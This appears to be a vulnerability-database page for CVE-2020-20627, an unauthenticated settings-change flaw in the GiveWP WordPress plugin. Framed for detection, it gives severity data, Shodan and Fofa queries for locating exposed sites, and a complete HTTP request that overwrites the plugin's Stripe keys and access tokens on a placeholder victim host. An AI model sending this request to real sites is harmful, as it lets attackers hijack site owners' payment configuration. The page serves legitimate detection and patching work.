🔙 목록으로 돌아가기

CVE-2020-20627: GiveWP - Missing Authorization to Settings Update

TitleGiveWP - Missing Authorization to Settings Update
Authordaffainfo
SeverityMedium
ImpactAttackers can modify plugin settings without authentication, potentially leading to unauthorized transactions or configuration changes.
RemediationUpdate to the latest version of GiveWP plugin that addresses this issue.
CVSS Score5.3
EPSS Score0.06148
CVE IDCVE-2020-20627
CWE IDCWE-306
Shodan Queryhttp.html:"/wp-content/plugins/give/"
Fofa Querybody="/wp-content/plugins/give/"
Tags cve cve2020 wp wordpress wp-plugin givewp unauth intrusive vkev

🔍 Vulnerability Description

GiveWP plugin through 2.5.9 for WordPress contains an unauthenticated settings change caused by insecure access in includes/gateways/stripe/includes/admin/admin-actions.php, letting attackers modify settings without authentication, exploit requires no authentication.

🌐 HTTP Request

GET /wp-admin/admin-post.php?page=give-settings&stripe_publishable_key=zHgrOfKo&stripe_publishable_key_test=Tmtwt9cZ&stripe_user_id=lGq15LMe&stripe_access_token=trRNa506&stripe_access_token_test=n6whv9vD&connected=1 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-us) AppleWebKit/534.16+ (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.3
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-20627.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-20627.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A